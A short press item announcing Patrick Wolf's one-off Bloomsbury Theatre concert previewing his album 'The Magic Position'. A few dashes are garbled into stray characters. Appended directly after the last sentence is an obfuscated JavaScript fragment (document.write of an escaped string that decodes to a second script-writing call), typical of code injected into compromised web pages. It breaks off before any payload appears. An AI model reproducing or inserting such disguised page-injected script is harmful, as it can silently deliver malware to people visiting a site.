Unique London concert to preview new album, ‘The Magic Position'
Patrick Wolf, the acclaimed young performer and songwriter, plays a unique concert at London's Bloomsbury Theatre on Thursday 30th March to introduce the songs from his forthcoming album, ‘The Magic Position'.
The show - called An Audience With Patrick Wolf - will be split into halves, with the first section devoted to special acoustic renditions of songs from Wolf's two previous albums, his debut ‘Lycanthropy' released in 2003 and last year's ‘Wind in the Wires'. He will be accompanied by a string quartet.
The latter section of the concert will exclusively preview tracks from the new album â€" Wolf's first for the Loog label â€" which is in stores this summer. The Bloomsbury concert is the first and only time Wolf will be performing with this particular format and line-up although he will be touring the UK with a different show after the release of ‘The Magic Position'. The album was written, produced and arranged by Wolf and recorded in both Vienna and London.
Tickets for the concert are certain to be at a premium and fans should check the theatre box office for availability.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
